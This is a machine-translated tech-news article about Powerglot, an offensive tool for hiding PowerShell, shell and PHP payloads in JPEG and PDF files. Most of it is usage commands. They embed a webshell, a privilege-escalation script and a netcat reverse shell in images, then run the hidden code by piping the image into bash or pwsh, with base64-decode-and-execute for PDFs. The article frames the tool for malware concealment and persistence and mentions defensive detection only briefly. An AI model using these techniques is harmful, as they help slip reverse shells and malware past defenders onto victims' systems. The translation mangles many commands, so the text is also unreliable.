Shulou(Shulou.com)05/31 Report--

This article is to share with you about what tool Powerglot is. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

Powerglot

Powerglot is a powerful aggressive PowerShell script coding tool that implements its functions based on Polyglots. In essence, Powerglot is an aggressive security tool for malware, privilege escalation, horizontal penetration, and reverse Shell.

Powerglot can use Polyglots to encode various types of scripts, such as offensive PowerShell scripts, and does not need a loader to run Payload.

In red team exercises or other offensive tasks, Payload camouflage / hiding is generally accomplished by steganography, especially when avoiding network layer protection mechanism, which is also a common technology in PowerShell Payload script development. Recent malware and APT organizations have chosen similar methods to attack, such as APT32, APT37, Ursnif, Powload, LightNeuron/Turla, Platinum APT, Waterbug/Turla, Lokibot, dukes and Tianium.

Powerglot is a multi-functional cross-platform attack and defense tool based on Polyglots. Powerglot allows developers to hide script code (PowerShell, Shell scripts, PHP, etc.) in digital images. At present, developers of this tool are also adding new file format support. Unlike other offensive tools or malware, Powerglot does not need any loader to execute information hidden in the target file, thus minimizing the noise of malicious programs on the target system.

Powerglot has a clear use in attack / penetration missions, but it also applies to blue team researchers. As far as we know, this tool is the first universal and completely open source offensive coding tool, it can help researchers to use Polyglots to search for hidden information, and this information can help developers to achieve malware hiding or persistent infection in the target system.

Function introduction

Code such as PowerShell, Shell scripts, and PHP is encoded into an image file, and supports the recovery / execution of hidden information (Payload) without any loader. PowerGlot is suitable for a variety of file formats, but currently only supports JPEG and PDF, other formats support is currently under development.

PowerGlot is a complete open source tool that can help researchers detect malicious code, especially the results hidden by public tools such as Truepolyglot or stegoSploit. Currently, developers are adding support for JPEG, PNG, GIF, BMP, ZIP, PDF, MP3 and other formats to PowerGlot.

Tool installation # git clone https://github.com/mindcrypt/powerglot# python3 powerglot tool use & parameters

Here are some examples of how to use Powerglot to hide Payload:

Example 1-hide the PowerShell/PHP/Shell script in a JPEG image: # python3 powerglot.py-o payload.ps1 cat.jpg cat-hidden1.jpg# python3 powerglot.py-o webshell.php cat.jpg cat-hidden2.jpg# python3 powerglot.py-o shell.sh cat.jpg cat-hidden3.jpg sample II-hide a weighted Shell script in a JPEG image: # python3 powerglot.py-o linenum.sh cat.jpg cat-linenum.jpg# file cat- Linenum.jpg (It is a valid JPEG file) # feh cat-lineum.jpg (The image is properly showed in an image viewer) # We can execute the script in several ways: a) cat cat-linenum | bash b) chmod + x cat-linenum.jpeg . / cat-linenum.jpeg sample 3-hide an netcat reverse channel in a JPEG image: # Attacker# echo "nc 127.0.0.1 4444" > netcat.sh# python3 powerglot.py-o netcat.sh cat.jpeg cat-netcat.jpeg# nc-nvlp 4444 # Victim# chmod + x cat-netcat.jpg |. / cat-netcat.jpg sample IV-PDF hiding: # Create b64.sh with your favourite payloadbase64 Linenum.sh-w 0 > b64.sh# Edit B64 .shecho "code in b64.sh" | base64-d | bash # python3 powerglot-o b64.sh sample.pdf test.pdf# file test.pdf# xpdf test.pdf# Execute payload# cat test.pdf | bash or chmod + x test.pdf;. / test.pdf sample 5: # python3 powerglot.py-o script.ps1 cat.jpeg cat-ps.jpeg# file cat-ps.jpeg# feh cat-ps.jpeg# Execute payload (example) # cat cat-ps.jpeg | pwsh PS / home/alfonso/PowerGlot/POWERSHELL > get-process [Suspicious file]-[. / cat-end-extra1.jpg].. Thank you for reading! This is the end of this article on "what is Powerglot?". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, you can share it for more people to see!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.